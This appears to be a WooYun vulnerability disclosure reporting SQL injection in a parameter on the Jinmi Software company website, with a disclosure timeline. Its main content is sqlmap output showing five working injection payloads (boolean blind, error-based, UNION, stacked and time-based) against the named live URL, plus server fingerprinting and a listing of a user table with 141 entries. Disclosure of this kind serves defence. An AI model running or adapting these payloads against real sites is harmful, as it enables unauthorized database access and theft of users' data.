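2016-03-24: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2016-05-08: The vendor has actively ignored the vulnerability; details disclosed to the public
SQL injection on the 金米软件 (Jinmi Software) website
Injection point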
http://www.jmtcsoft.com/list.aspx?group=4
Proof of injection
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: group
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: group=4' AND 8227=8227 AND 'AYqw'='AYqw

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: group=4' AND 6451=CONVERT(INT,(CHAR(58)+CHAR(103)+CHAR(118)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6451=6451) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(102)+CHAR(112)+CHAR(119)+CHAR(58))) AND 'aECu'='aECu

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: group=4' UNION ALL SELECT CHAR(58)+CHAR(103)+CHAR(118)+CHAR(98)+CHAR(58)+CHAR(103)+CHAR(104)+CHAR(80)+CHAR(68)+CHAR(66)+CHAR(77)+CHAR(100)+CHAR(112)+CHAR(84)+CHAR(83)+CHAR(58)+CHAR(102)+CHAR(112)+CHAR(119)+CHAR(58), NULL, NULL, NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: group=4'; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: group=4' WAITFOR DELAY '0:0:5'--
---
[21:16:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: JMWebSite
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| dbo.dt_Users | 141     |
+--------------+---------+
test
Unable to contact the vendor, or the vendor actively refused
Vulnerability Rank: 8 (rated by WooYun)